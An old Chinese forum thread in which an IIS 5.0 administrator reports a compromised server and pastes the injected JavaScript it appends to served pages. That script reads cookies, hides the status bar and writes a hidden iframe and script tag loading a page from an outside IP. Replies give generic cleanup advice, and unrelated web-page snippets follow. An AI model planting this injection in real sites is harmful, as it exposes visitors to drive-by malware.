网站被攻击,求助

guostong 2004-06-25 12:17:28
windows2000 + sp4 + iis5.0

c:\winnt\system32\inetsrv\ 下出现奇怪文件

iisxxx.dll 其中 xxx 为随机数

其中内容为一段 javascript

当我访问网站时,系统将我的每个javascript 文件最后加上 iisxxx.dll 的内容

...全文
162 8 打赏 收藏 转发到动态 举报
写回复
用AI写文章
8 条回复
切换为时间正序
请发表友善的回复…
发表回复
guostong 2004-06-25
  • 打赏
  • 举报
 回复
没发现什么异常进程

D:\tools>tlist -s
0 System Process
8 System
160 SMSS.EXE
184 CSRSS.EXE Title:
204 WINLOGON.EXE Title: NetDDE Agent
232 SERVICES.EXE Svcs: Alerter,AppMgmt,Browser,Dhcp,dmserver,Dnscache,Event
log,lanmanserver,lanmanworkstation,LmHosts,Messenger,PlugPlay,ProtectedStorage,s
eclogon,TrkWks,Wmi
244 LSASS.EXE Svcs: NtLmSsp,PolicyAgent,SamSs
428 svchost.exe Svcs: RpcSs
452 spoolsv.exe Svcs: Spooler
480 msdtc.exe Svcs: MSDTC
600 AWHOST32.EXE Svcs: awhost32
644 defwatch.exe Svcs: DefWatch
660 tcpsvcs.exe Svcs: DHCPServer,SimpTcp
680 svchost.exe Svcs: EventSystem,IAS,Netman,NtmsSvc,RasMan,SENS
716 LLSSRV.EXE Svcs: LicenseService
780 sqlservr.exe Svcs: MSSQLSERVER
896 rtvscan.exe Svcs: Norton AntiVirus Server
876 regsvc.exe Svcs: RemoteRegistry
1000 mstask.exe Svcs: Schedule
1072 SNMP.EXE Svcs: SNMP
1132 WinMgmt.exe Svcs: WinMgmt
1148 WINS.EXE Svcs: WINS
1160 svchost.exe Svcs: wuauserv
1192 dfssvc.exe Svcs: Dfs
1228 DNS.EXE Svcs: DNS
1244 inetinfo.exe Svcs: IISADMIN,SMTPSVC,W3SVC
1312 mqsvc.exe Svcs: MSMQ
1380 mssearch.exe Svcs: MSSEARCH
2016 MSGSYS.EXE
2052 explorer.exe Title: Program Manager
2120 vptray.exe Title: Norton AntiVirus Corporate Edition
2128 internat.exe Title:
2160 sqlmangr.exe Title: SQL Server Service Manager
2236 svchost.exe Svcs: TapiSrv
2196 DLLHOST.EXE
1744 DLLHOST.EXE
1804 mdm.exe Title: OleMainThreadWndName
1320 conime.exe Title:
1216 CMD.EXE Title: C:\WINNT\system32\cmd.exe - tlist -s
2040 tlist.exe
liuweihug 2004-06-25
  • 打赏
  • 举报
 回复
这是木马
到安全模式关掉这个程序,杀毒啊
查看一下端口啊
guostong 2004-06-25
  • 打赏
  • 举报
 回复
iisxxx.dll 中的内容如下:

<script language="JavaScript">
<!--
var qxco7=document.cookie;
function gc099(n21)
{
var ix=qxco7.indexOf(n21+"=");
if(ix==-1) return null;
ix=qxco7.indexOf("=",ix)+1;
var es=qxco7.indexOf(";",ix);
if(es==-1)es=qxco7.length;
return unescape(qxco7.substring(ix,es));
}

function sc088(n24,v8)
{
var today=new Date();
var expiry=new Date(today.getTime()+600000);
if(v8!=null&&v8!="")document.cookie=n24+"="+escape(v8)+";
expires="+expiry.toGMTString();
qxco7=document.cookie;
}

function okx12()
{
window.status="";
setTimeout("okx12()", 200);
}

okx12();
if(location.href.indexOf("https")!=0)
{
if(gc099("trk716")==null)
{
document.write("<script language=\"JavaScript\" src=\"http://217.107.218.147/dot.php\"></script><iframe src=\"http://217.107.218.147/dot.php\" height=\"1\" width=\"1\" scrolling=\"no\" frameborder=\"no\"/>");
sc088("trk716","4");}}// -->
</script>
qiang312 2004-06-25
  • 打赏
  • 举报
 回复
扫描系统,打补丁,检查进程,查系统日志
Justin2003 2004-06-25
  • 打赏
  • 举报
 回复
把進程列表貼出來給高手看看. ^_^
xwmhn 2004-06-25
  • 打赏
  • 举报
 回复
用杀毒软件或木马进行查毒。。。。
jin0706 2004-06-25
  • 打赏
  • 举报
 回复
打开任务管理器,检查可疑进程,然后根据进程名查看硬盘上的文件
进入安全模式删
haosheng 2004-06-25
  • 打赏
  • 举报
 回复
看看有哪些不明的进程,删掉就是了。附高手对进程讲解表:
http://community.csdn.net/Expert/topic/3094/3094474.xml?temp=.5774958
七色虎建站最新版
七色虎建站最新版 官网 http://74hu.cn 1、后台无法登录,或者网站无法留言 问题:网站能够运行,但后台登录后无法进去管理,或者无法留言,文章内容看不了? 原因:可能是服务器空间有权限问题,无法写入数据。 解决:请与购买商联系。 2、频频出现错误 问题:刚装完程序,网站虽然能够运行,但程序错误频频出现? 原因:可能程序是网友修改过的,也有可能程序版本太旧。 解决:请到官网下载最新的程序,如果没有解决请到官网反馈。 3、网站突发问题 问题:网站平时好好的,近几天突然出现很多的问题? 原因:可能是服务器问题,如网络攻击,也有可能是程序问题,如木马上传。 解决:保留数据库,其他全删掉。到官网下载最新的程序,删掉其中的空数据库,剩下的上传即可。 4、页面自动跳首页 问题:某个页面一点击就自动转到首页? 原因:可能是页面调用出错,系统有错误检查机制,遇到影响系统运行的错误就自动转首页。也有可能是浏览器兼容问题。 解决:仔细检查页面所有内容是否出错。如未能解决问题请到官网求助 5、如何修改管理目录 问题:目前管理地址/admin和/webadmin,容易被人访问 解决:修改管理文件夹的名称,修改db.asp文件,将wapadmin和webadmin对应修改即可,目前支持子目录功能,修改方式相同。 6、系统时间不正确 问题:系统当前时间与实际时间有偏差 原因:空间主机时间错误,或者是使用外国的主机 解决:后台配置-时间配置,输入正确的时间保存即可。系统就会自动修正时间 7、论坛无法管理和会员无法注册 问题:后台管理点击论坛管理出错,前台会员无法注册 原因:国内部分主机有关键词屏蔽 解决:打开config/bbs.asp文件,将bbsagree设定的内容清空,就是改为bbsagree="" 8.游客无法评论文章 问题:游客无法评论文章,总是显示“为提高评论质量,两次评论间隔必须大于10秒!”? 原因:系统时间错误 解决:联系空间购买商,或者启用程序时间修正功能,改系统时间为正确的北京时间。 9.首页空白,后台可以进 问题:系统升级后首页显示空白,但后台可以登录管理 原因:升级步骤出错 解决:按说明文档一步一步操作,升级程序后执行数据库升级补丁updateXXX.asp。如果没有解决请到官网反馈。
天空网络电影系统 v5.0 ASP免费版
采用原天空网络电影系统V4.5强大美观的界面及V5.0 Asp版的内核,并改进首页推荐模式,您只需要在后台设定几个影片ID即可完成首页影片的推荐,方便下次更改,而不必像以往那样在影片管理中取消原来的首页推荐再新增加首页推荐。 从界面上而言绝对是娱乐站点的首选模板,从功能上而言,实用的页面显示,影片推荐,分类浏览等,而一切功能只需后台轻松的修改提交即可,极适合网站内容频繁更新的大型娱乐站点。 修正了V4.7所有错误内容,新增宽带支付,会员消费订单记录,动态网吧管理 • 国内首个采用30位CFS编码+32位MD5编码加密 • 全面支持北京易达信动 Qpay网上支付平台,完美支付银行卡在线支付、手机支付、声讯支付,宽带支付,支付完成全自动开通会员 • 人性化的后台管理配合多样式广告设置(首页广告,漂浮广告,播放器广告,强制点广告观看电影) • 采用全站防SQL注入,防爆库等暴力攻击或破解,隐藏错误信息等。通过后台管理设置各方面的防注入或屏蔽方式 注:包含以前版所有重要功能,如:会员下线功能,批量修改电影地址,实时记录攻击网站IP,禁止IP访问,开通网吧功能,批量生成影卡等功能。 •人性化设计 无论从后台管理还是前台设置都是可体现出人性化设置,前台所显示的每一个细节都可以通过后台轻松修改 •实用性 本系统不止是一个影视系统而是为你以后整合各方面网站而打下了良好的基础,你可以通过整合而丰富网站的内容更可以自由制作前台风格从而实现你对系统的需求 •防护性 对于部份用户可以也试过由于SQL注入漏洞从而比黑客们有所利用,本系统采用全站防SQL注入,爆库等暴力攻击或破解,并采用隐藏错误信息等方法禁止显示。并通过后台管理设置各方面的防注入或敞屏方式 •安全性 相信现在大多的系统对于密码都是用MD5加密的,但现今网络MD5加密已经不再是安全的了,因为有太多MD5破解或解密软件!而天空网络电影系统国内首个打破MD5加密全面采用CFS更安全的加密方式加密!从而实现有密码也无从破解 QPAY在线支付平台设置方法    登陆后台->接口设置->在线支付设置 在1st-pay用户名处,填入你在1st-pay网站(即Qpay支付平台)注册的用户名即可 此免费版的限制: a)限制服务器系统时间必须在2006-4-25至2006-5-5日之间,否则无法进入网站后台管理。 b)限制网站同时访问IP地址数为30(适合网吧用户使用,一个网吧只有一个IP) c)限制ASP文件源码仅允许播放器和网站导航条修改。 d)不提供任何的技术服务和其它相关服务(包含QQ、电话、升级服务等),用户有问题可以到论坛发帖求助。 e)不提供流媒体防盗插件。 网站后台帐号密码均为administrator 后台登陆地址http://您的域名/skyucadmin/login.asp
华为开发者大赛云计算专场
1.华为企业云API使用讲解 该课程介绍如何通过华为企业云API进行二次开发,并选取一个实战案例。后把遇到问题的求助渠道介绍给大家。
大学生网络安全教育.docx
大学生网络安全教育 大学生网络安全教育全文共11页,当前为第1页。LT 大学生网络安全教育全文共11页,当前为第1页。 大学生网络安全教育全文共11页,当前为第2页。 大学生网络安全教育全文共11页,当前为第2页。 大学生网络安全教育全文共11页,当前为第3页。 大学生网络安全教育全文共11页,当前为第3页。 大学生网络安全教育全文共11页,当前为第4页。 大学生网络安全教育全文共11页,当前为第4页。 大学生网络安全教育全文共11页,当前为第5页。擞,百"病"全消。 2、上网时表现得神思敏捷,口若悬河,并感到格外开心,一旦离开网络便语言迟钝,情绪低落,怅然若失。3、只有不断增加上网时间才能感到满足,从而使得上网时间失控,经常比预定时间长。 4、 无法控制去上网的冲动。5、每看到一个新网址就会心跳加快或心率不齐。6、只要长时间不上网操作就手痒难耐。有时刚刚离网就有又想上网的冲动。有时早晨一起床就有想上网这种欲望。甚至夜间趁小便的空也想打开电脑。7、每当因特网的线路被掐断或由于其它原因不能上网,便感到烦躁不安或情绪低落。8、 平常有不由自主地敲击键盘的动作,或身体有颤抖的现象。9、对家人或亲友隐瞒迷恋因特网的程度。10、 因迷恋因特网而面临失学、失业或失去朋友的危险。如果你其中有4项或4项以上表现,且持续时间已经达1年以上,那么就表明你已经患上了IAD。   "网络综合征(IAD)",这种新的心理疾病使得沉溺网络不能自拔受到损害的问题成为目前心理学者的一个新课题。由于网络具有日新月异的变化,非常符合青少年的好奇心,导致青少年由最初的随意浏览到最终的深陷其中,只有在网络中才能找到乐趣和安慰,以至于在现实生活中无法与他人正常交往。  我们不可能抛弃网络,那叫因噎废食,那么,我们该怎样做才能保障我们的健康呢?  提示:  A、珍爱生命,远离教唆性的有害游戏。  B、上网时间一天不要超过三小时,多做运动。  C、多余同龄人交流,避免上瘾。一但发现有过分依赖网络的症候,可求助于心理咨询。 三、网络文明  互联网是开放的,信息庞杂多样,既有大量进步、健康、有益的信息,也有不少反动、迷信、黄色的内容,上网的人也是良莠不齐。   案例一:有些网站污言秽语不绝于眼,给我们的生活带来了种种不合谐和极其不良的影响。不少青少年长期接触此类网站,一直处在一个虚拟的世界,从而失去了价值判断。   案例二:4月11日,满洲里市公安局侦破一起因网骂引发的人命案,死者不满16周岁,花季少年,命丧黄泉,只缘网骂。    案例三:一封建迷信网站,宣称有大师预测,内容包括八字预测、姓名预测、八卦预测、择旦等内容。  我们应怎样避免迷失在不良网络中呢?  提示:加强自身道德修养,不浏览封建迷信网站,不发布违法、污秽言论,不对他人进行人身攻击。结语:(播放tomykim)  要做安全、健康、文明上网的青少年,必须遵守"全国青少年网络文明公约":? 要善于网上学习 不浏览不良信息? 要诚实友好交流 不侮辱欺诈他人? 要增强自护意识 不随意约会网友? 要维护网络安全 不破坏网络秩序? 要有益身心健康 不沉溺虚拟时空 大学生网络安全教育全文共11页,当前为第5页。 大学生网络安全教育全文共11页,当前为第6页。网络安全教育主题班会二 一、 班会主题: 提高网络安全意识 合理利用网络资源 二、 班会目标: 1、提升大学生三种网络相关的能力:分辨网络安全隐患的能力、正确使用网络资源的能力、合理使用网络的自控能力。 2、树立一种网络观念:网络是大学生的学习资源,而不仅仅是娱乐工具。引导大学生将网络成为自己的学习工具,做网络的主人,使丰富的网络资源为己所用,提高自我竞争力。 三、 班会背景: 新学期伊始,我所带的大一学生已经成为大二学生,他们已经基本适应了大学生活,在专业学习、校园生活、社会实践等方面都进展有序。为了方便自我学习和生活,很多同学在大二学年都配置了电脑,在宿舍也开通了网络,网络在为同学们的网上课程学习、课外娱乐活动、大学生校内网交流、网上购物、网络资源使用等提供了极大的便利,但我们也同时看到,网络使用是一把双刃剑,很多同学在网络交友、网络购物、网络游戏等中误入歧途,有的交友不慎感情受伤甚至人身受到伤害、有的沉迷游戏荒废学业不得不退学、有的网络购物不慎被骗遭受经济损失的等等,可以说,网络在给我们大学生呈现一幅美好画面的同时,背后也波涛汹涌遍布暗礁。大二学生有的还没有足够的警惕心和较高的辨别能力,很容易在网络中迷失自我,陷入危机,有必要通过主题班会的宣讲,提高同学们分辨网络安全隐患的能力、正确使用网络资源的能力、合理使用网络的自控能力,真正做到网络服务于同学们的成长成才。 四、班会时间:待定 五、班会地点:待定 六、班会对象: 全体同学 七、准备工作: 1. 对同学们网络使
网络安全突发事件应急预案.docx
网络安全突发事件应急预案全文共5页,当前为第1页。网络安全突发事件应急预案全文共5页,当前为第1页。网络安全突发事件应急预案 网络安全突发事件应急预案全文共5页,当前为第1页。 网络安全突发事件应急预案全文共5页,当前为第1页。 为确保校园网安全有序平稳运行,保证校园网络信息安全和网络安全,避免校园网络被黑客攻击、病毒入侵,更好的服务于学校的教育教学,特制定本预案。 一、指导思想 维护安全、健康、有序的网络环境,保证网络平台和信息技术支撑学校教学、科研、管理的各项工作正常高效的运行。 二、组织指挥 1.组织机构 网络安全管理领导小组 组,长: 副组长: 组 员: 2.职责任务 (1)加强宣传,监督检查各教研组处室网络信息安全措施的落实情况。 (2)加强网上信息监控巡查,重点监控可能出现有害信息的网站、网页。 (3)及时组织有关部门和专业技术人员对校园网上出现的突发事件进行处理并根据情况的严重程度上报有关部门。 (4)与教育局装备站保持热线联系,协助装备站对教育网络信息网络安全突发事件应急预案全文共5页,当前为第2页。网络安全突发事件应急预案全文共5页,当前为第2页。安全的监控和保障。 网络安全突发事件应急预案全文共5页,当前为第2页。 网络安全突发事件应急预案全文共5页,当前为第2页。 三、处置原则 1.主动防范,跟踪检查。根据情况通报和预警信息,及时采取措施,做好防范工作,最大限度地减少危害,同时加大监督、检查力度,确保落实。 2.先期处置,及时上报。重大突发事件,要迅速向市公安局网监科报案,保护好现场,并先期开展工作,及时控制事态,防止扩大蔓延,减少和降低危害。 四、处置程序及措施 1.校园网内发现网络突发事件,网络安全管理人员应立即关闭其连接,保存好相关技术数据和资料,并上报学校网络安全管理工作领导小组。并采用以下方案: (1)病毒传播:及时寻找并断开传播源,判断病毒的类型、性质、可能的危害范围;为避免产生更大的损失,保护健康的计算机,必要时可关闭相应的端口,甚至相应楼层的网络,及时请有关技术人员协助,寻找并公布病毒攻击信息,以及杀毒、防御方法。 (2)外部入侵:判断入侵的来源,区分外网与内网,评价入侵可能或已经造成的危害。对入侵未遂、未造成损害的,且评价威胁很小的外网入侵,定位入侵的IP地址,及时关闭入侵的端口,限制入侵的lP地址的访问。对于已经造成危害的,应立即采用断开网络连接的方法,避免造成更大损失和带来恶劣影响。 (3)内部入侵:查清入侵来源,如IP地址、所在办公室等信息,网络安全突发事件应急预案全文共5页,当前为第3页。网络安全突发事件应急预案全文共5页,当前为第3页。同时断开对应的交换机端口,针对入侵方法调整或更新入侵检测设备。对于无法制止的多点入侵和造成损害的,应及时关闭被入侵的服务器或相应设备。 网络安全突发事件应急预案全文共5页,当前为第3页。 网络安全突发事件应急预案全文共5页,当前为第3页。 (4)网络故障:判断故障发生点和故障原因,能够迅速解决的尽快排除故障;必要时向计算机网络公司求助技术援助,并优先保证主要应用系统的运转。 (5)其它未列出的不确定因素造成的事件,在确保安全的前提下,结合具体的情况,做出相应的处理。不能处理的及时寻求上级有关部门的支持和帮助。 2.校园网络安全领导小组应及时掌握网上重大突发事件有关信息,及时组织相关部门和人员到达现场进行调查处理。 3.做好善后工作。在确认事件得到有效控制,危害已经消除后,按照审批程序,报经批准后,终止处置行动。 4.校园网络安全领导小组根据网络突发事件的严重程度,保持市公安局网监科联络,积极配合公安机关网络安全监察部门工作。 六、保障措施 校园网络与信息安全应急处置是一项长期的、持续的、跟踪式的、发展变化的工作,是有组织的科学与社会行为,必须做好各项应急保障工作。 1.队伍保障 重视信息安全队伍的建设,并不断提高工作人员的信息安全防范意识和技术水平,确保安全事件应急处置过程和重建工作中技术人员网络安全突发事件应急预案全文共5页,当前为第4页。网络安全突发事件应急预案全文共5页,当前为第4页。的在岗与防护能力。 网络安全突发事件应急预案全文共5页,当前为第4页。 网络安全突发事件应急预案全文共5页,当前为第4页。 2.技术保障 重视网络信息系统的建设和升级换代,重视网络安全整体方案的不断完善,加强技术管理,确保网络信息系统的稳定与安全,聘请信息安全顾问为应急处置过程和重建工作提供咨询和技术支持。 3.资金保障 根据校园网络与信息系统安全预防和应急处置工作的实际需要,将所需网络安全设备纳入年度财政预算,给予资金保障。 4.安全培训 举办全校教职工网络与信息安全知识培训,加强教职工和学员的计算机操作、信息技能、网络和信息安全等相关知识的宣传普及,增强预
安全技术/病毒

9,506

社区成员

28,984

社区内容

发帖
与我相关
我的任务
社区描述
Windows专区 安全技术/病毒
社区管理员
  • 安全技术/病毒社区
加入社区
  • 近7日
  • 近30日
  • 至今

加载中

查看更多榜单
社区公告
暂无公告

试试用AI创作助手写篇文章吧

+ 用AI写文章